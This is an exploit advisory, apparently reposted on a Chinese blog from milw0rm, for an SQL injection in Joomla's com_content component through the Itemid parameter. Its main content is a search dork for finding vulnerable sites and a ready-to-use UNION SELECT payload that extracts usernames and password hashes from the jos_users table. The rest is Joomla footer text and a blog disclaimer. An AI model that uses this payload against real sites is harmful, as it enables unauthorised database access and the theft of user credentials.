 

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln _Exploit_网络安全_

2024-03-23 15:45:22 浏览量(83)

-------------------------------------------------------------------------------------------

Joomla Component com_content SQL Injection Vulnerabity

-------------------------------------------------------------------------------------------

Author : unknown_styler

Dork : inurl:com_content

POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}

Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999 union select 1,concat_ws(0x3a,username,password),3,4,5 from jos_users/*

------------------------------------------------------------------------------------------------------------------------------------

Greetings : h4ck-y0u.org

side note:

Página de contenido
Projecte Joomla!
July 2004
(C) 2005 Open Source Matters. All rights reserved.
http://www.gnu.org/copyleft/gpl.html GNU/GPL
admin@joomla.org
www.joomla.org
1.0.0

# milw0rm.com [2008-07-08]

【声明】：本博客不参与任何交易，也非中介，仅记录个人感兴趣的主机测评结果和优惠活动，内容均不作直接、间接、法定、约定的保证。访问本博客请务必遵守有关互联网的相关法律、规定与规则。一旦您访问本博客，即表示您已经知晓并接受了此声明通告。

分享到